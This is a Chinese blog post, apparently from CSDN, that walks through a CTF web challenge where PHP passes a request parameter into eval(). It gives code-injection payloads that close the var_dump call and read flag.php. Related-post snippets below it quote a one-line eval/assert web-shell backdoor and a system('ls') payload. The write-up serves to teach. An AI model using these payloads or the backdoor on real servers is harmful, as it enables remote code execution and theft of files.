10.26_eval函数引起的命令执行漏洞

最新推荐文章于 2024-09-05 20:30:00 发布
最新推荐文章于 2024-09-05 20:30:00 发布
阅读量3.2k 收藏 4
点赞数 2
分类专栏: CTF_1天1道
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43460822/article/details/102758970
版权

“百度杯”CTF比赛 2017 二月场
在这里插入图片描述
题目:

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

这道题跟上道题有点类似,可以用上道题的方法试试,不行再换,不过题目给出的提示说flag不在变量中,所以很可能不行,但还是要试试.
构建payload:

c58dd912148d495fbe0805414fce2d9028999e42b4d74467.changame.ichunqiu.com/?hell0=$GLOBALS

所以flag不在全局变量中。现在在看看源码中几个重要的函数:
var_dump()会返回数据变量的类型和值
eval()会把字符串当作php代码
看到eval(),想到可以用命令执行漏洞
构建payload
1.?hello=);show_source('flag.php');var_dump(
在这里插入图片描述
2、?hello=file("flag.php")
在这里插入图片描述

liuhandong-99
关注
专栏目录
960755102536998Futbin_v10.26.apk
06-22
960755102536998Futbin_v10.26.apk
暑假第四周练习(二)web练习
qidiandexiaowu
08-02 1075
目录: 0×00 本地包含 0×00 本地包含 现在题目链接已经打不开了,在网上找到源码: <?php include "flag.php"; //flag存储在flag.php这个脚本,但是被注释掉了,我们需要把flag.php的源码整个显示出来 $a = @$_REQUEST['hello']; //无论是以POST还是GET方式,都可以给$a赋值 eval( "var_dump($a);"); /
CTF之路:关于PHP eval() 注入问题
zw05011的博客
01-03 5042
CTF之路:关于PHP eval() 注入问题
命令执行漏洞和代码执行漏洞
最新发布
weixin_68416970的博客
09-05 997
命令执行漏洞(Command Execution Vulnerability)和代码执行漏洞(Code Execution Vulnerability)都是远程代码执行(Remote Code Execution, RCE)的类型,它们允许攻击者在目标系统上执行任意命令或代码。
Bugku——Web——eval
慎铭的博客
02-02 1175
<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 给出了如上代码,很明显,flag在flag.php文件内。 REQUEST方法既可以接受GET方法,也可以接受POST方法,方便起见,我们选择GET方法。 eval函数 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且
php函数(三)eval函数对比详解
tutu123456789101112的博客
03-05 918
preg_match(’/^\w*$/’,$a ),对$a的值进行匹配,如果是特殊字符返回error,反之进入eval. var_dump(),结构化的打印变量值. eval(),字符串按照 PHP 代码来计算. &amp;amp;lt;?php include &amp;quot;flag.php&amp;quot;; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )) { die...
PHP代码函数执行漏洞
知足且坚定,温柔且上进
04-07 1907
eval函数 eval()函数可以将参数中的变量值执行,通常处于处理模板和动态加载PHP代码,但也常常被攻击者利用,比如一句话后门程序: <?php eval($_GET[cmd])?> assert()函数 assert()函数在PHP中用来判断一个表达式是否成立,返回真或假。如果直接将PHP代码传入也会被执行。 <?php assert($_GET["cmd"]);?&g...
1_SQLQuery10.26 progect.sql
10-27
1_SQLQuery10.26 progect.sql
MySQL精简版(无需安装)只有10.26MB_bat启动关闭
03-09
好东西就要分享一下,这个MYSQL数据库直接点一下就可以用,,MySQL精简版(无需安装),压缩只有10.62MB
PyPI 官网下载 | seven_cloudapp_frame-1.0.10.26.tar.gz
02-11
《PyPI官网下载:seven_cloudapp_frame-1.0.10.26.tar.gz——探索Python云原生分布式框架》 在Python的世界,PyPI(Python Package Index)是官方的软件仓库,它提供了丰富的Python库供开发者使用。本文将深入...
游云川 10.26.rar
10-26
很抱歉,但根据您提供的信息,“游云川 10.26.rar”这个压缩包文件的描述过于简洁,没有包含任何具体的IT知识点。标签为空,也无法提供额外的上下文。压缩包内的文件名同样只有一个“游云川 10.26”,这并不足以推断...
bugku题(本地包含和变量1)和Linux学习(四)
qq_43624349的博客
06-16 2555
本地包含 打开题目是下面的一些代码: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 这明显是PHP代码,然后进行分析。 这些代码涉及到的几个函数: 1.$_REQUEST: 可以获取以POS...
bugku-eval
m0_62094846的博客
10-24 4291
这是一道php题,标题是eval,先查一下eval的用法 Eval,var_dump,echo的区别 var_dump()会将传入的变量打印到页面(变量类型,变量长度和变量值) eval()会执行传入到其中的php代码 echo输出的是最终的结果(变量类型和字符串) eval("var_dump($a);")就是把$a的内容打印出来 $a= @$_REQUEST['hello'] Request:使用 Request 对象访问任何基于 HTTP 请求传递的所有信息 可以看...
eval-Bugku CTF
m0_56859693的博客
09-05 1515
今天在bugku刷到了一道基础题,感觉考察的很全面。 源代码如下 第一行 include是将flag.php包含在页面代码中,也不难推测flag在flag.php中 第二行 $_REQUEST可以将用户传入的hello传给服务器 第三行分两个部分:eval和var_dump var_dump即把输入的hello作为字符串string输出 eval则可以把字符串当作php代码执行 把hello赋值为system("ls") 发现包含flag.php和index.php ...
春秋web题目解题及思路汇总(自用搜集)
Devil_B的博客
05-12 1410
(Misc-Web)爆破-2 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); 题目知识点: file_get_contents(path)函数,获得指定路径下的文件内容,以字符串的形式返回出来。 eval(str)函数,把括号的字符串,当作php命令执行。 解题思路: 这一题,把一个file_get_contents()函数命令赋值给$a传入var
Bugkuctf-变量1
Sacrifice_li的博客
10-17 1143
写在前:最近开始记录我的ctfweb的学习笔记,顺便记录一下学习到的Wp。 Bugkuctf题目,变量1 这涉及了几个知识点: 1.eval()函数 eval函数,可以将括号内的字符串变成php代码执行,前提是括号内的内容以分号结尾;如果代码解析错误,则会返回false。 2.var_dump()函数 将显示一个或多个表达式的值,包括表达式的类型和值,数组会递归展开。 点...
CTF/CTF练习平台-本地包含【eval函数闭合及代码段的理解】
热门推荐
Sp4rkW的博客
08-21 4万+
原题内容: 地址:http://120.24.86.145:8003/ 怎么说呢,难其实也不难,还是基本知识点掌握不足吧,写个wp记录下自己学习到的知识点 &lt;?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(_...
php函数漏洞总结
qq_37410729的博客
07-31 1425
php一些漏洞函数
CTF WP记录 ---web
yiyisuzhi的博客
11-08 848
说明:本人网安小白,单纯的想记录通过CTF来巩固自己所学的知识,见证自己的成长 flag:一周四篇,不定期更新,从零开始,前期尽量解释清楚涉及到的所有知识点。 第一题:“百度杯”CTF比赛 2017 二月场 爆破-1 打开题目连接直接显示了一段代码: <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);");
static string str_log_path = "\\\\10.8.10.26\\AutoTaskLog\\MES\\HoldLot850_881ToWeiXin\\log\\"
07-25
你好!关于你提供的代码,这是一个静态字符串变量 `str_log_path`,它存储了一个文件路径。根据路径的格式,它指向了一个网络共享文件夹 `\\\\10.8.10.26\\AutoTaskLog\\MES\\HoldLot850_881ToWeiXin\\log\\`。这个路径可能是用于记录某个任务的日志文件的存储位置。你有什么关于这个路径的问题吗?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值